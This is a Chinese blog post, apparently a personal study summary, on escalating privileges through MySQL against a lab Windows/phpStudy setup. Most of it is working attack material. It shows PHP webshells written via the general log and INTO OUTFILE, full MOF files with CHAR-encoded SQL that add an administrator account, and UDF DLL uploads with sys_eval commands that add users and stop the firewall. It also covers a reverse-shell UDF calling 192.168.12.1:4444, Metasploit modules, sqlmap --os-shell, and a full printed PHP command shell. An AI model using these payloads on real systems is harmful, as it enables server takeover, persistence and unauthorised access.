最近在复习mysql提权,所以正好写篇文章总结一下关于mysql的常见提权姿势
相关操作
select @@version; 查询数据库版本
select @@basedir; 查询MYSQL安装路径
select @@plugin_dir ; 查看plugin路径
select host, user, password from mysql.user; 查询hash (MySQL <= 5.6 )
select host, user, authentication_string from mysql.user; 查询hash (MySQL >= 5.7 )
select @@version_compile_os,@@version_compile_machine; 查询当前操作系统
secure-file-priv 读写权限
secure_file_prive=null ––限制mysqld 不允许导入导出
secure_file_priv=/path/ – --限制mysqld的导入导出只能发生在默认的/path/目录下
secure_file_priv=’’ – --不对mysqld 的导入 导出做限制
添加写权限
1.show variables like '%secure%';
2.修改my.ini 插入 secure-file-priv=""
mysql开启远程连接
use mysql;
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%'IDENTIFIED BY 'root' WITH GRANT OPTION;
flush privileges;
1、通过mysql日志功能
SHOW VARIABLES LIKE 'general%' 查询日志
set global general_log = "ON"; 开启日志记录
set global general_log_file='C://phpStudy//PHPTutorial//WWW//shell.php'; 设置日志路径
select '<?php @eval($_POST[1]);?>'; 写入一句话
![051872f72cb5c2966f10f4d037e8a8c0.png](https://i-blog.csdnimg.cn/blog_migrate/571b21f8920661b719a1a67eead02cb1.jpeg)
![03071f937c581f8540a3bd4a840ea732.png](https://i-blog.csdnimg.cn/blog_migrate/e9bdefe46fc5656ba21b42f6c943a5a1.jpeg)
连接成功
2、mof提权
1.原理
在 c:/windows/system32/wbem/mof/目录下的 nullevt.mof 每分钟都会有一个特定的时间去执行一次
(由"And TargetInstance.Second = 5";控制,这里输入5就是每分钟的第五秒执行。一会 mof 文件我会分享的。),那么把 cmd 命令添加到 nullevt.mof 中,cmd 命令就会自动执行了。
2.mof代码
2.1添加用户
#pragma namespace(".rootsubscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "RootCimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa "Win32_LocalTime" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject("WScript.Shell")nWSH.run("net.exe user admin admin /add")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
2.2添加用户到管理员
#pragma namespace(".rootsubscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "RootCimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa "Win32_LocalTime" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject("WScript.Shell")nWSH.run("net.exe localgroup administrators admin /add")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
3.写入mof文件
3.1写入“添加用户”
SELECT CHAR(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) INTO dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
3.2写入“添加到管理员”
select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
3、udf提权
利用步骤:
3.1 创建目录
Mysql<5.0,导出路径随意;
5.0<MySQL<5.1,则需要导出至目标服务器的系统目录(c:/windows/system32/)
MySQL>=5.1,udf.dll必须放到mysql安装目录的libplugin文件夹才能创建自定义函数.目录默认是不存在的需要自己创建
查询版本:
select @@version;
查看plugin路径:
show variables like '%plugin%';
select @@plugin_dir;
查找MYSQL目录:
select @@basedir;
利用NTFS ADS创建目录
select 'xxx' into dumpfile 'C:phpStudyPHPTutorialMySQLlib::$INDEX_ALLOCATION';
select 'xxx' into dumpfile 'C:phpStudyPHPTutorialMySQLlibplugin::$INDEX_ALLOCATION';
3.2 写入dll文件
select 0x4D5A90000300000004000000FFFF.... into dumpfile 'C:phpStudyPHPTutorialMySQLlibpluginlib_mysqludf_sys.dll'
其他写法
CREATE TABLE udftmp (c blob); //新建一个表,名为udftmp,用于存放本地传来的udf文件的内容。
INSERT INTO udftmp values(unhex(‘udf文件的16进制格式‘)); //在udftmp中写入udf文件内容
SELECT c FROM udftmp INTO DUMPFILE
'C:phpStudyPHPTutorialMySQLlibpluginlib_mysqludf_sys.dll'
select unhex(十六进制)
select 0x十六进制
select char(77,90,144...)
lib_mysqludf_sys.dll文件可以从sqlmap解密获取
在sqlmap/extra/cloak/路径下
python3 .cloak.py -d -i ....dataudfmysqlwindows64lib_mysqludf_sys.dll_
会在sqlmapdataudfmysqlwindows64目录下生成lib_mysqludf_sys.dll
以16进制保存,在本地mysql执行
select hex(load_file('c:lib_mysqludf_sys.dll')) into dumpfile 'c://1.txt'
也可以利用sqlmap上传dll
sqlmap.py -d mysql://root:root@127.0.0.1:3306/test --file-write=d:/lib_mysqludf_sys.dll --file-dest=C:phpStudyPHPTutorialMySQLlibpluginlib_mysqludf_sys.dll
3.3 创建函数
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll'
查看用户自定义函数: select * from mysql.func;
![d0ea41572b96c6c839a4c382802dcdfe.png](https://i-blog.csdnimg.cn/blog_migrate/d1a49907c79304d6ec8f43d2829185c9.png)
3.4 执行命令
select sys_eval('ipconfig');
select sys_eval('net stop policyagent'); 关闭防火墙
select sys_eval('net user admin admin /add'); 添加用户
select sys_eval('net localgroup administrators admin /add'); 将用户加到管理组
drop function sys_eval; 删除函数
![9c2da72aee21b749665202f5833a6dba.png](https://i-blog.csdnimg.cn/blog_migrate/c1e23713adb4958e3813a782cca1c637.png)
4、msf
use auxiliary/scanner/mysql/mysql_login 尝试登录
![7b046b1162a5fb072e37f35e733c694a.png](https://i-blog.csdnimg.cn/blog_migrate/08d551f084f40aff12d12eacee908e52.jpeg)
use exploit/multi/mysql/mysql_udf_payload udf提权
![c3b61bf2d164b999ffc5a6e7feaea208.png](https://i-blog.csdnimg.cn/blog_migrate/049da1f869f9f3c15f21910e27a0deb7.jpeg)
use exploit/windows/mysql/mysql_mof mof提权
![47669206a0c99e39eab4851f2f668746.png](https://i-blog.csdnimg.cn/blog_migrate/b511bbee35b31e139d07ef8c928df814.jpeg)
5.反弹端口连接提权
相当于UDF提权的另类用法,创建反弹shell的函数,用于反弹cmdshell
select 0x4d5a4b45524e454c33322e444c4....... #代码太长,链接在下方
into DUMPFILE 'C:phpStudyPHPTutorialMySQLlibpluginudf.dll'
CREATE FUNCTION backshell RETURNS STRING SONAME 'udf.dll';
select backshell('');
select backshell("192.168.12.1",4444);
backshell.txt 提取码:mu88
![d43137c609d199c6d17cfc7f023483d5.png](https://i-blog.csdnimg.cn/blog_migrate/c997e5e280f6eaa72549cfe8c47a739c.jpeg)
![437785ac7c3ae5883c08acb09a03465d.png](https://i-blog.csdnimg.cn/blog_migrate/bd32ad5e60c9b9f0a9336724d069ed02.jpeg)
![88502097aa6652e2726f92fef947c695.png](https://i-blog.csdnimg.cn/blog_migrate/649806f3b31cdad9ee817c574515e2f0.jpeg)
成功反弹shell
6、文件写入
写入一句话木马
select '<?php @eval($_POST[1])?>' into outfile 'C:phpStudyPHPTutorialWWW1.php'
![c894f02f596a614d8efbdff5bffaa3d0.png](https://i-blog.csdnimg.cn/blog_migrate/880fdd605965ae9c2a8b5cff02ed0e73.jpeg)
执行成功
7、os-shell
前提条件:需要知道网站绝对路径,有写权限
1.sqlmap -u http://192.168.12.17/sql/Less-1/?id=1 --os-shell
![307bed0ee058c2a7d0c109d3dc3f9a19.png](https://i-blog.csdnimg.cn/blog_migrate/e031d1b8378e5c303b5a27d246058cac.jpeg)
![01880871ac639ab580d54d5d91f89945.png](https://i-blog.csdnimg.cn/blog_migrate/b0a694020cb5d22580fe4605e45a3de1.jpeg)
2.选择php(4)
3.custom location(2)
4.输入绝对路径:C:phpStudyPHPTutorialWWWsql
5.连接成功,这时候可以执行命令了,尝试执行ipconfig,发现执行成功
![1142433077816532ae92e99006e61fe5.png](https://i-blog.csdnimg.cn/blog_migrate/39ee3df3b5f4e7ecf948d865e47abb78.jpeg)
分析:
端口转发使用burp进行抓包分析复现上述过程
sqlmap -u http://192.168.12.17/sql/Less-1/?id=1 --os-shell --proxy=http://127.0.0.1:8080
![08377495a464301e1ad2b16c497d9a8c.png](https://i-blog.csdnimg.cn/blog_migrate/fafd6a71a46ef568b6384d8f710ca0e3.jpeg)
对数据包进行解码
id=-6947' OR 4810=4810 LIMIT 0,1 INTO OUTFILE
'C:/phpStudy/PHPTutorial/WWW/tmpuwkqc.php' LINES TERMINATED BY
<?php
if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if
(phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_fi
le($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or
die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["
tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File
uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST
enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE
value=1000000000><b>sqlmap file uploader</b><br>
<input name=file type=file><br>
to directory: <input type=text name=uploadDir
value=C:phpStudyPHPTutorialWWW> <input type=submit name=upload
value=upload></form>";}?>
--
发现第一个数据包是写入一个带有文件上传功能的php
![c79142d4c8c01a98290a850532df06ff.png](https://i-blog.csdnimg.cn/blog_migrate/089d70023dd78dee9bd72a8cff2d1bd3.png)
分析第二数据包
![d6f50cee0dec1c118904fc8af5584192.png](https://i-blog.csdnimg.cn/blog_migrate/d7932a77ad2ed3db55f6f600b73f79b5.jpeg)
通过刚才文件写入的php上传了一个cmd马
<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set("max_execution_time",0);$z=@ini_get("disable_functions");if(!empty($z)){$z=preg_replace("/[, ]+/",',',$z);$z=explode(',',$z);$z=array_map("trim",$z);}else{$z=array();}$c=$c." 2>&1n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f("system")){ob_start();system($c);$w=ob_get_clean();}elseif(f("proc_open")){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f("shell_exec")){$w=shell_exec($c);}elseif(f("passthru")){ob_start();passthru($c);$w=ob_get_clean();}elseif(f("popen")){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f("exec")){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}echo"<pre>$w</pre>";?>
然后进行命令执行
![ffa82d99e5b7212c3048f53250f6a7fb.png](https://i-blog.csdnimg.cn/blog_migrate/5fc7ca2372e85cceec429257a912f6eb.jpeg)
![d3dcec12001f37dc52cf42d573064072.png](https://i-blog.csdnimg.cn/blog_migrate/d99d0a44de16a4b76d9cd7078f8de3f0.jpeg)
命令执行成功
http://weixin.qq.com/r/9DsfB2fEdjoJrSNk927m (二维码自动识别)